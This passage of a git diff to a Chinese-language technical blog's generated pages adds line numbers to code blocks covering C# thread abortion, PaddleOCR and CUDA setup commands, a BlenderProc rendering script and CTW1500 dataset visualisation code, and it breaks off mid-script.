                                  {
                                  try
                                  {

                                  Console.WriteLine("Child thread starts");
                                  // 计数到 10
                                  for (int counter = 0; counter <= 10; counter++)
                                  {
                                  Thread.Sleep(500);
                                  Console.WriteLine(counter);
                                  }
                                  Console.WriteLine("Child Thread Completed");

                                  }
                                  catch (ThreadAbortException e)
                                  {
                                  Console.WriteLine("Thread Abort Exception");
                                  }
                                  finally
                                  {
                                  Console.WriteLine("Couldn't catch the Thread Exception");
                                  }

                                  }

                                  static void Main(string[] args)
                                  {
                                  ThreadStart childref = new ThreadStart(CallToChildThread);
                                  Console.WriteLine("In Main: Creating the Child thread");
                                  Thread childThread = new Thread(childref);
                                  childThread.Start();
                                  // 停止主线程一段时间
                                  Thread.Sleep(2000);
                                  // 现在中止子线程
                                  Console.WriteLine("In Main: Aborting the Child thread");
                                  childThread.Abort(); // 终止子线程
                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  -
                                  In Main: Creating the Child thread
                                  Child thread starts
                                  0
                                  1
                                  2
                                  In Main: Aborting the Child thread
                                  Thread Abort Exception
                                  Couldn't catch the Thread Exception
                                  +
                                  1
                                  2
                                  3
                                  4
                                  5
                                  6
                                  7
                                  8
                                  9
                                  10
                                  11
                                  12
                                  13
                                  14
                                  15
                                  16
                                  17
                                  18
                                  19
                                  20
                                  21
                                  22
                                  23
                                  24
                                  25
                                  26
                                  27
                                  28
                                  29
                                  30
                                  31
                                  32
                                  33
                                  34
                                  35
                                  36
                                  37
                                  38
                                  39
                                  40
                                  41
                                  42
                                  43
                                  44
                                  45
                                  46
                                  47
                                  48
                                  using System;
                                  using System.Threading;

                                  namespace MultithreadingApplication
                                  {
                                  class ThreadCreationProgram
                                  {
                                  public static void CallToChildThread()
                                  {
                                  try
                                  {

                                  Console.WriteLine("Child thread starts");
                                  // 计数到 10
                                  for (int counter = 0; counter <= 10; counter++)
                                  {
                                  Thread.Sleep(500);
                                  Console.WriteLine(counter);
                                  }
                                  Console.WriteLine("Child Thread Completed");

                                  }
                                  catch (ThreadAbortException e)
                                  {
                                  Console.WriteLine("Thread Abort Exception");
                                  }
                                  finally
                                  {
                                  Console.WriteLine("Couldn't catch the Thread Exception");
                                  }

                                  }

                                  static void Main(string[] args)
                                  {
                                  ThreadStart childref = new ThreadStart(CallToChildThread);
                                  Console.WriteLine("In Main: Creating the Child thread");
                                  Thread childThread = new Thread(childref);
                                  childThread.Start();
                                  // 停止主线程一段时间
                                  Thread.Sleep(2000);
                                  // 现在中止子线程
                                  Console.WriteLine("In Main: Aborting the Child thread");
                                  childThread.Abort(); // 终止子线程
                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  +
                                  1
                                  2
                                  3
                                  4
                                  5
                                  6
                                  7
                                  8
                                  In Main: Creating the Child thread
                                  Child thread starts
                                  0
                                  1
                                  2
                                  In Main: Aborting the Child thread
                                  Thread Abort Exception
                                  Couldn't catch the Thread Exception
                                  @@ -1898,6 +1896,8 @@

                                  目录

                                  var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paddle-\345\212\250\346\211\213\345\255\246 OCR/index.html" "b/posts/Paddle-\345\212\250\346\211\213\345\255\246 OCR/index.html" index d19ba61e67..755c656c7d 100644 --- "a/posts/Paddle-\345\212\250\346\211\213\345\255\246 OCR/index.html" +++ "b/posts/Paddle-\345\212\250\346\211\213\345\255\246 OCR/index.html" @@ -44,8 +44,6 @@ - - @@ -412,25 +410,25 @@

                                • ~~paddlepaddle CPU 版本(智算中心的 NPU 连华为工作人员都搞不定,只好用 CPU 了)~~还是寄,绝!
                                -
                                conda create -n PaddleOCR python=3.7
                                source activate PaddleOCR
                                python -m pip install paddlepaddle==2.4.2 -i https://mirror.baidu.com/pypi/simple
                                +
                                1
                                2
                                3
                                conda create -n PaddleOCR python=3.7
                                source activate PaddleOCR
                                python -m pip install paddlepaddle==2.4.2 -i https://mirror.baidu.com/pypi/simple
                                • paddlepaddle GPU 版本(就在自己的 Ubuntu 下装了)寄了
                                -
                                conda create -n PaddleOCR python=3.7
                                conda activate PaddleOCR
                                python -m pip install paddlepaddle-gpu==2.4.2 -i https://mirror.baidu.com/pypi/simple
                                +
                                1
                                2
                                3
                                conda create -n PaddleOCR python=3.7
                                conda activate PaddleOCR
                                python -m pip install paddlepaddle-gpu==2.4.2 -i https://mirror.baidu.com/pypi/simple
                                • 安装 paddleocr
                                -
                                pip install --upgrade pip
                                pip install paddleocr
                                +
                                1
                                2
                                pip install --upgrade pip
                                pip install paddleocr
                                • 安装 Jupyter Notebook:
                                -
                                sudo apt update 
                                sudo apt upgrade
                                sudo apt install python3-pip
                                sudo pip3 install --upgrade pip
                                sudo pip3 install notebook
                                +
                                1
                                2
                                3
                                4
                                5
                                sudo apt update 
                                sudo apt upgrade
                                sudo apt install python3-pip
                                sudo pip3 install --upgrade pip
                                sudo pip3 install notebook

                                运行 Jupyter Notebook:

                                -
                                jupyter notebook
                                +
                                1
                                jupyter notebook

                                会得到一串 url,用 Windows 下的浏览器打开它:

                                jpg

                                https://github.com/PaddlePaddle/PaddleOCR 里加载仓库,然后:

                                -
                                cd PaddleOCR
                                pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
                                +
                                1
                                2
                                cd PaddleOCR
                                pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

                                4 OCR 技术导论

                                4.1 OCR 技术的应用场景

                                目前常说的 OCR 一般指场景文字识别(Scene Text Recognition,STR),主要面向自然
                                @@ -538,20 +536,20 @@

                                5.2.1 快速使用

                                wsl2 下安装失败,我的 CUDA 版本太新了。

                                安装 paddleocr whl 包:

                                -
                                pip install --upgrade pip
                                pip install paddleocr -i https://pypi.tuna.tsinghua.edu.cn/simple
                                +
                                1
                                2
                                pip install --upgrade pip
                                pip install paddleocr -i https://pypi.tuna.tsinghua.edu.cn/simple

                                命令行调用文本检测模型预测图像 ./test.jpg

                                -
                                # --image_dir 指向要预测的图像路径--rec false 表示不使用识别识别,只执行文本检测
                                ! paddleocr --image_dir ./test.jpg --rec false
                                +
                                1
                                2
                                # --image_dir 指向要预测的图像路径--rec false 表示不使用识别识别,只执行文本检测
                                ! paddleocr --image_dir ./test.jpg --rec false

                                然后就会喜提错误 ImportError: libcudart.so.10.2: cannot open shared object file: No such file or directory。因为自己的 CUDA 是 11.5 的,没有 10.2 的 libcudart.so.10.2

                                报错解决:libcudart.so.10.2: cannot open shared object file: No such file or directory_Love 绘梨衣的 Mr.lu 的博客-CSDN 博客 里下载 libcudart.so.10.2,并把它放到 cuda 的安装目录中。

                                jpg

                                -
                                sudo cp -i libcudart.so.10.2 /usr/lib/cuda/lib64
                                +
                                1
                                sudo cp -i libcudart.so.10.2 /usr/lib/cuda/lib64

                                配置 $LD_LIBRARY_PATH

                                -
                                export LD_LIBRARY_PATH=/usr/lib/cuda/lib64:$LD_LIBRARY_PATH
                                +
                                1
                                export LD_LIBRARY_PATH=/usr/lib/cuda/lib64:$LD_LIBRARY_PATH

                                发现这个电脑连 CUDNN 都没装?giao

                                cuDNN Download | NVIDIA Developer 下载 CUDNN,还必须是 10.2 的,得到 cudnn-10.2-linux-x64-v7.6.5.32.tgz,解压之:

                                -
                                tar -zxvf cudnn-10.2-linux-x64-v7.6.5.32.tgz 
                                +
                                1
                                tar -zxvf cudnn-10.2-linux-x64-v7.6.5.32.tgz 

                                然后复制这些文件到 CUDA 的目录下:

                                -
                                sudo cp cuda/lib64/* /usr/lib/cuda/lib64
                                sudo cp cuda/include/* /usr/lib/cuda/include/
                                +
                                1
                                2
                                sudo cp cuda/lib64/* /usr/lib/cuda/lib64
                                sudo cp cuda/include/* /usr/lib/cuda/include/

                                5.2.2 DBNet 算法详解

                                DB 文本检测模型可以分为三个部分:

                                  @@ -837,6 +835,8 @@

                                  目录

                                  var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-3D-FRONT-3D Furnished Rooms with layOuts and semaNTics/index.html b/posts/Paper-3D-FRONT-3D Furnished Rooms with layOuts and semaNTics/index.html index 5f23731718..8a301a6475 100644 --- a/posts/Paper-3D-FRONT-3D Furnished Rooms with layOuts and semaNTics/index.html +++ b/posts/Paper-3D-FRONT-3D Furnished Rooms with layOuts and semaNTics/index.html @@ -44,8 +44,6 @@ - - @@ -516,7 +514,7 @@

                                  BlenderProc

      -
      import blenderproc as bproc
      import argparse
      import os
      import numpy as np
      +
      1
      2
      3
      4
      import blenderproc as bproc
      import argparse
      import os
      import numpy as np
      1. 解析命令行参数:

        @@ -533,7 +531,7 @@

        BlenderProc

-
parser = argparse.ArgumentParser()
parser.add_argument("front", help="Path to the 3D front file")
parser.add_argument("future_folder", help="Path to the 3D Future Model folder.")
parser.add_argument("front_3D_texture_path", help="Path to the 3D FRONT texture folder.")
parser.add_argument("output_dir", help="Path to where the data should be saved")
args = parser.parse_args()
+
1
2
3
4
5
6
parser = argparse.ArgumentParser()
parser.add_argument("front", help="Path to the 3D front file")
parser.add_argument("future_folder", help="Path to the 3D Future Model folder.")
parser.add_argument("front_3D_texture_path", help="Path to the 3D FRONT texture folder.")
parser.add_argument("output_dir", help="Path to where the data should be saved")
args = parser.parse_args()
  1. 检查文件夹是否存在:

    @@ -547,7 +545,7 @@

    BlenderProc

-
if not os.path.exists(args.front) or not os.path.exists(args.future_folder):
raise excerption("One of the two folders does not exist!")
+
1
2
if not os.path.exists(args.front) or not os.path.exists(args.future_folder):
raise excerption("One of the two folders does not exist!")
  1. 初始化:
      @@ -555,7 +553,7 @@

      BlenderProc

-
bproc.init()
+
1
bproc.init()
  1. 加载前景 3D 对象:

    @@ -572,7 +570,7 @@

    BlenderProc

-
mapping_file = bproc.utility.resolve_resource(os.path.join("front_3D", "3D_front_mapping.csv"))
mapping = bproc.utility.LabelIdMapping.from_csv(mapping_file)

# set the light bounces 设置光线反射
bproc.renderer.set_light_bounces(diffuse_bounces=200, glossy_bounces=200, max_bounces=200,
transmission_bounces=200, transparent_max_bounces=200)

# load the front 3D objects 加载 FRONT-3D 对象
loaded_objects = bproc.loader.load_front3d(
json_path=args.front,
future_model_path=args.future_folder,
front_3D_texture_path=args.front_3D_texture_path,
label_mapping=mapping
)

# Init sampler for sampling locations inside the loaded front3D house
# 初始化采样器,用于加载的 FRONT-3D 房屋内的采样位置
point_sampler = bproc.sampler.Front3DPointInRoomSampler(loaded_objects)
+
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
mapping_file = bproc.utility.resolve_resource(os.path.join("front_3D", "3D_front_mapping.csv"))
mapping = bproc.utility.LabelIdMapping.from_csv(mapping_file)

# set the light bounces 设置光线反射
bproc.renderer.set_light_bounces(diffuse_bounces=200, glossy_bounces=200, max_bounces=200,
transmission_bounces=200, transparent_max_bounces=200)

# load the front 3D objects 加载 FRONT-3D 对象
loaded_objects = bproc.loader.load_front3d(
json_path=args.front,
future_model_path=args.future_folder,
front_3D_texture_path=args.front_3D_texture_path,
label_mapping=mapping
)

# Init sampler for sampling locations inside the loaded front3D house
# 初始化采样器,用于加载的 FRONT-3D 房屋内的采样位置
point_sampler = bproc.sampler.Front3DPointInRoomSampler(loaded_objects)
  1. 初始化采样器和BVH树:

    @@ -586,7 +584,7 @@

    BlenderProc

-
# Init bvh tree containing all mesh objects 包含所有网格对象的初始化 bvh 树
bvh_tree = bproc.object.create_bvh_tree_multi_objects([o for o in loaded_objects if isinstance(o, bproc.types.MeshObject)])
+
1
2
# Init bvh tree containing all mesh objects 包含所有网格对象的初始化 bvh 树
bvh_tree = bproc.object.create_bvh_tree_multi_objects([o for o in loaded_objects if isinstance(o, bproc.types.MeshObject)])
  1. 循环生成场景:

    @@ -612,7 +610,7 @@

    BlenderProc

-
poses = 0
tries = 0


def check_name(name):
for category_name in ["chair", "sofa", "table", "bed"]:
if category_name in name.lower():
return True
return False


# filter some objects from the loaded objects, which are later used in calculating an interesting score
# 从加载的对象中过滤一些对象,这些对象稍后用于计算有趣的分数
special_objects = [obj.get_cp("category_id") for obj in loaded_objects if check_name(obj.get_name())]

proximity_checks = {"min": 1.0, "avg": {"min": 2.5, "max": 3.5}, "no_background": True}
while tries < 10000 and poses < 10:
# Sample point inside house 房屋内的采样点
height = np.random.uniform(1.4, 1.8)
location = point_sampler.sample(height)
# Sample rotation (fix around X and Y axis) 样品旋转(围绕 X 轴和 Y 轴固定)
rotation = np.random.uniform([1.2217, 0, 0], [1.338, 0, np.pi * 2])
cam2world_matrix = bproc.math.build_transformation_mat(location, rotation)

# Check that obstacles are at least 1 meter away from the camera and have an average distance between 2.5 and 3.5 meters and make sure that no background is visible, finally make sure the view is interesting enough
# 检查障碍物是否距离相机至少 1 米,平均距离在 2.5 到 3.5 米之间,并确保没有可见的背景,最后确保视图足够有趣
if bproc.camera.scene_coverage_score(cam2world_matrix, special_objects, special_objects_weight=10.0) > 0.8 \
and bproc.camera.perform_obstacle_in_view_check(cam2world_matrix, proximity_checks, bvh_tree):
bproc.camera.add_camera_pose(cam2world_matrix)
poses += 1
tries += 1
+
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
poses = 0
tries = 0


def check_name(name):
for category_name in ["chair", "sofa", "table", "bed"]:
if category_name in name.lower():
return True
return False


# filter some objects from the loaded objects, which are later used in calculating an interesting score
# 从加载的对象中过滤一些对象,这些对象稍后用于计算有趣的分数
special_objects = [obj.get_cp("category_id") for obj in loaded_objects if check_name(obj.get_name())]

proximity_checks = {"min": 1.0, "avg": {"min": 2.5, "max": 3.5}, "no_background": True}
while tries < 10000 and poses < 10:
# Sample point inside house 房屋内的采样点
height = np.random.uniform(1.4, 1.8)
location = point_sampler.sample(height)
# Sample rotation (fix around X and Y axis) 样品旋转(围绕 X 轴和 Y 轴固定)
rotation = np.random.uniform([1.2217, 0, 0], [1.338, 0, np.pi * 2])
cam2world_matrix = bproc.math.build_transformation_mat(location, rotation)

# Check that obstacles are at least 1 meter away from the camera and have an average distance between 2.5 and 3.5 meters and make sure that no background is visible, finally make sure the view is interesting enough
# 检查障碍物是否距离相机至少 1 米,平均距离在 2.5 到 3.5 米之间,并确保没有可见的背景,最后确保视图足够有趣
if bproc.camera.scene_coverage_score(cam2world_matrix, special_objects, special_objects_weight=10.0) > 0.8 \
and bproc.camera.perform_obstacle_in_view_check(cam2world_matrix, proximity_checks, bvh_tree):
bproc.camera.add_camera_pose(cam2world_matrix)
poses += 1
tries += 1
  1. 配置渲染器:

    @@ -626,7 +624,7 @@

    BlenderProc

-
# Also render normals
bproc.renderer.enable_normals_output()
bproc.renderer.enable_segmentation_output(map_by=["category_id"])
+
1
2
3
# Also render normals
bproc.renderer.enable_normals_output()
bproc.renderer.enable_segmentation_output(map_by=["category_id"])
  1. 渲染整个流程:

    @@ -640,7 +638,7 @@

    BlenderProc

-
# render the whole pipeline
data = bproc.renderer.render()
+
1
2
# render the whole pipeline
data = bproc.renderer.render()
  1. 将数据写入.hdf5文件:
      @@ -649,7 +647,7 @@

      BlenderProc

-
# write the data to a .hdf5 container
bproc.writer.write_hdf5(args.output_dir, data)
+
1
2
# write the data to a .hdf5 container
bproc.writer.write_hdf5(args.output_dir, data)

jpg

好像没什么卵用……

@@ -869,6 +867,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-A Comprehensive Review of YOLO-From YOLOv1 to YOLOv8 and Beyond/index.html b/posts/Paper-A Comprehensive Review of YOLO-From YOLOv1 to YOLOv8 and Beyond/index.html index 5be4a69010..9d43bfc9bc 100644 --- a/posts/Paper-A Comprehensive Review of YOLO-From YOLOv1 to YOLOv8 and Beyond/index.html +++ b/posts/Paper-A Comprehensive Review of YOLO-From YOLOv1 to YOLOv8 and Beyond/index.html @@ -44,8 +44,6 @@ - - @@ -1160,6 +1158,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-A novel non-negative matrix factorization technique for decomposition of Chinese characters with application to secret sharing/index.html b/posts/Paper-A novel non-negative matrix factorization technique for decomposition of Chinese characters with application to secret sharing/index.html index d05a5d8bc2..aa94b34480 100644 --- a/posts/Paper-A novel non-negative matrix factorization technique for decomposition of Chinese characters with application to secret sharing/index.html +++ b/posts/Paper-A novel non-negative matrix factorization technique for decomposition of Chinese characters with application to secret sharing/index.html @@ -44,8 +44,6 @@ - - @@ -751,6 +749,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-ABCNet-Real-time Scene Text Spotting with Adaptive Bezier-Curve Network/index.html b/posts/Paper-ABCNet-Real-time Scene Text Spotting with Adaptive Bezier-Curve Network/index.html index e4e1da685c..f7dc3256e8 100644 --- a/posts/Paper-ABCNet-Real-time Scene Text Spotting with Adaptive Bezier-Curve Network/index.html +++ b/posts/Paper-ABCNet-Real-time Scene Text Spotting with Adaptive Bezier-Curve Network/index.html @@ -44,8 +44,6 @@ - - @@ -718,6 +716,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-An Annotation Saved is an Annotation Earned-Using Fully Synthetic Training for Object Instance Detection/index.html b/posts/Paper-An Annotation Saved is an Annotation Earned-Using Fully Synthetic Training for Object Instance Detection/index.html index 25a88c556a..64578cca86 100644 --- a/posts/Paper-An Annotation Saved is an Annotation Earned-Using Fully Synthetic Training for Object Instance Detection/index.html +++ b/posts/Paper-An Annotation Saved is an Annotation Earned-Using Fully Synthetic Training for Object Instance Detection/index.html @@ -44,8 +44,6 @@ - - @@ -836,6 +834,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-An Improved Formula Extraction Method of Printed Chinese Layouts Based on Connected Component Run-Length Feature/index.html b/posts/Paper-An Improved Formula Extraction Method of Printed Chinese Layouts Based on Connected Component Run-Length Feature/index.html index 3c7c057df2..d5f42be838 100644 --- a/posts/Paper-An Improved Formula Extraction Method of Printed Chinese Layouts Based on Connected Component Run-Length Feature/index.html +++ b/posts/Paper-An Improved Formula Extraction Method of Printed Chinese Layouts Based on Connected Component Run-Length Feature/index.html @@ -44,8 +44,6 @@ - - @@ -400,7 +398,7 @@

Paper-An Improved Formula Extraction Method of Printed Chinese Layouts Based
@@ -931,6 +929,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Deep Visual Domain Adaptation-A Survey/index.html b/posts/Paper-Deep Visual Domain Adaptation-A Survey/index.html index cece8b33ae..f7e9e545eb 100644 --- a/posts/Paper-Deep Visual Domain Adaptation-A Survey/index.html +++ b/posts/Paper-Deep Visual Domain Adaptation-A Survey/index.html @@ -44,8 +44,6 @@ - - @@ -4546,6 +4544,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/index.html b/posts/Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/index.html index 58935b91f8..d05959473e 100644 --- a/posts/Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/index.html +++ b/posts/Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/index.html @@ -44,8 +44,6 @@ - - @@ -480,11 +478,11 @@

数据集

  • gt_ctw1500.zip(测试集图像的标注文件,txt 格式)
  • 可视化训练集图像的代码:

    -
    import xml.etree.ElementTree as ET

    index = 997

    # 定义路径
    image_dir = r'E:\dataset\CTW1500\ctw1500\train_images\\'
    label_dir = r"E:\dataset\CTW1500\ctw1500\ctw1500_train_labels\\"

    image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
    label_path = os.path.join(label_dir, "{:04d}".format(index) + '.xml')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    # 解析 XML 文件
    tree = ET.parse(label_path)
    root = tree.getroot()

    # 遍历每个图像
    for image_elem in root.findall("image"):
    file_name = image_elem.get("file")

    # 遍历每个标注框
    for box_elem in image_elem.findall("box"):
    box_height = int(box_elem.get('height'))
    box_width = int(box_elem.get('width'))
    box_left = int(box_elem.get('left'))
    box_top = int(box_elem.get('top'))

    print(f"Box height: {box_height}")
    print(f"Box width: {box_width}")
    print(f"Box left: {box_left}")
    print(f"Box top: {box_top}")

    # 读取 <segs> 的值并以逗号分割成列表
    segs = box_elem.find('./segs')
    segs_values = segs.text.split(',')

    segs_x = []
    segs_y = []
    print("Segments:")
    for i in range(0, len(segs_values), 2):
    segs_x.append(int(segs_values[i]))
    segs_y.append(int(segs_values[i+1]))
    segs = np.array([segs_x, segs_y], np.int32).T
    print(f"segs_x: {segs_x}, y: {segs_y}")

    transcriptions = box_elem.find("label").text

    # 获取所有 pts 标签
    pts_elems = box_elem.findall("pts")

    # 提取坐标信息
    pts_x = []
    pts_y = []
    for pts_elem in pts_elems:
    pts_x.append(int(pts_elem.get("x")))
    pts_y.append(int(pts_elem.get("y")))
    pts = np.array([pts_x, pts_y], np.int32).T
    # 打印标注信息
    print("File: ", file_name)
    print("Transcriptions: ", transcriptions)
    print("Points: ", pts)

    # 画图
    cv2.rectangle(image, (box_left, box_top), (box_left + box_width, box_top + box_height), (255, 255, 0), thickness=2)
    cv2.polylines(image, [segs], isClosed=False, color=(255, 255, 255), thickness=2)
    cv2.polylines(image, [pts], isClosed=False, color=(255, 0, 0), thickness=2)

    for p in pts:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (pts_x[0], pts_y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()
    -
    Box height: 108
    Box width: 565
    Box left: 201
    Box top: 351
    Segments:
    segs_x: [216, 302, 389, 476, 563, 651, 739, 766, 671, 576, 482, 388, 294, 201], y: [351, 383, 398, 407, 409, 391, 363, 406, 440, 458, 459, 451, 432, 398]
    File: 0997.jpg
    Transcriptions: VIOLENCE NEVER BRINGS
    Points: [[228 381]
    [245 390]
    [268 395]
    [289 406]
    [323 415]
    [352 422]
    [388 426]
    [417 431]
    [439 432]
    [473 436]
    [508 434]
    [540 433]
    [566 432]
    [601 429]
    [616 425]
    [634 421]
    [666 414]
    [683 406]
    [697 402]
    [722 392]
    [741 387]]
    Box height: 111
    Box width: 529
    Box left: 228
    Box top: 434
    Segments:
    segs_x: [251, 331, 411, 491, 571, 651, 731, 757, 669, 581, 493, 405, 316, 228], y: [437, 460, 474, 484, 479, 459, 434, 489, 528, 540, 545, 533, 522, 499]
    File: 0997.jpg
    Transcriptions: PERMANENT PEACE
    Points: [[259 475]
    [290 484]
    [319 487]
    [358 495]
    [396 505]
    [435 507]
    [472 511]
    [505 512]
    [543 513]
    [578 506]
    [613 499]
    [645 493]
    [682 481]
    [709 471]
    [731 464]]
    Box height: 96
    Box width: 37
    Box left: 466
    Box top: 127
    Segments:
    segs_x: [501, 501, 501, 502, 502, 502, 503, 466, 466, 466, 467, 467, 467, 468], y: [127, 143, 159, 175, 191, 207, 223, 220, 204, 189, 173, 158, 142, 127]
    File: 0997.jpg
    Transcriptions: LOC
    Points: [[486 141]
    [484 168]
    [485 205]]
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    import xml.etree.ElementTree as ET

    index = 997

    # 定义路径
    image_dir = r'E:\dataset\CTW1500\ctw1500\train_images\\'
    label_dir = r"E:\dataset\CTW1500\ctw1500\ctw1500_train_labels\\"

    image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
    label_path = os.path.join(label_dir, "{:04d}".format(index) + '.xml')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    # 解析 XML 文件
    tree = ET.parse(label_path)
    root = tree.getroot()

    # 遍历每个图像
    for image_elem in root.findall("image"):
    file_name = image_elem.get("file")

    # 遍历每个标注框
    for box_elem in image_elem.findall("box"):
    box_height = int(box_elem.get('height'))
    box_width = int(box_elem.get('width'))
    box_left = int(box_elem.get('left'))
    box_top = int(box_elem.get('top'))

    print(f"Box height: {box_height}")
    print(f"Box width: {box_width}")
    print(f"Box left: {box_left}")
    print(f"Box top: {box_top}")

    # 读取 <segs> 的值并以逗号分割成列表
    segs = box_elem.find('./segs')
    segs_values = segs.text.split(',')

    segs_x = []
    segs_y = []
    print("Segments:")
    for i in range(0, len(segs_values), 2):
    segs_x.append(int(segs_values[i]))
    segs_y.append(int(segs_values[i+1]))
    segs = np.array([segs_x, segs_y], np.int32).T
    print(f"segs_x: {segs_x}, y: {segs_y}")

    transcriptions = box_elem.find("label").text

    # 获取所有 pts 标签
    pts_elems = box_elem.findall("pts")

    # 提取坐标信息
    pts_x = []
    pts_y = []
    for pts_elem in pts_elems:
    pts_x.append(int(pts_elem.get("x")))
    pts_y.append(int(pts_elem.get("y")))
    pts = np.array([pts_x, pts_y], np.int32).T
    # 打印标注信息
    print("File: ", file_name)
    print("Transcriptions: ", transcriptions)
    print("Points: ", pts)

    # 画图
    cv2.rectangle(image, (box_left, box_top), (box_left + box_width, box_top + box_height), (255, 255, 0), thickness=2)
    cv2.polylines(image, [segs], isClosed=False, color=(255, 255, 255), thickness=2)
    cv2.polylines(image, [pts], isClosed=False, color=(255, 0, 0), thickness=2)

    for p in pts:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (pts_x[0], pts_y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    Box height: 108
    Box width: 565
    Box left: 201
    Box top: 351
    Segments:
    segs_x: [216, 302, 389, 476, 563, 651, 739, 766, 671, 576, 482, 388, 294, 201], y: [351, 383, 398, 407, 409, 391, 363, 406, 440, 458, 459, 451, 432, 398]
    File: 0997.jpg
    Transcriptions: VIOLENCE NEVER BRINGS
    Points: [[228 381]
    [245 390]
    [268 395]
    [289 406]
    [323 415]
    [352 422]
    [388 426]
    [417 431]
    [439 432]
    [473 436]
    [508 434]
    [540 433]
    [566 432]
    [601 429]
    [616 425]
    [634 421]
    [666 414]
    [683 406]
    [697 402]
    [722 392]
    [741 387]]
    Box height: 111
    Box width: 529
    Box left: 228
    Box top: 434
    Segments:
    segs_x: [251, 331, 411, 491, 571, 651, 731, 757, 669, 581, 493, 405, 316, 228], y: [437, 460, 474, 484, 479, 459, 434, 489, 528, 540, 545, 533, 522, 499]
    File: 0997.jpg
    Transcriptions: PERMANENT PEACE
    Points: [[259 475]
    [290 484]
    [319 487]
    [358 495]
    [396 505]
    [435 507]
    [472 511]
    [505 512]
    [543 513]
    [578 506]
    [613 499]
    [645 493]
    [682 481]
    [709 471]
    [731 464]]
    Box height: 96
    Box width: 37
    Box left: 466
    Box top: 127
    Segments:
    segs_x: [501, 501, 501, 502, 502, 502, 503, 466, 466, 466, 467, 467, 467, 468], y: [127, 143, 159, 175, 191, 207, 223, 220, 204, 189, 173, 158, 142, 127]
    File: 0997.jpg
    Transcriptions: LOC
    Points: [[486 141]
    [484 168]
    [485 205]]

    png

    可视化测试集图像的代码:

    -
    import cv2
    import os
    import matplotlib.pyplot as plt

    index = 1200

    image_dir = r'E:\dataset\CTW1500\ctw1500\test_images\\'
    label_dir = r'E:\dataset\CTW1500\ctw1500\gt_ctw1500\\'

    image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
    label_path = os.path.join(label_dir, "{:07d}".format(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    coords_text = annotation.strip().split(',####')
    coords = list(map(int, coords_text[0].split(',')))
    points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
    transcriptions = coords_text[1]

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)

    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

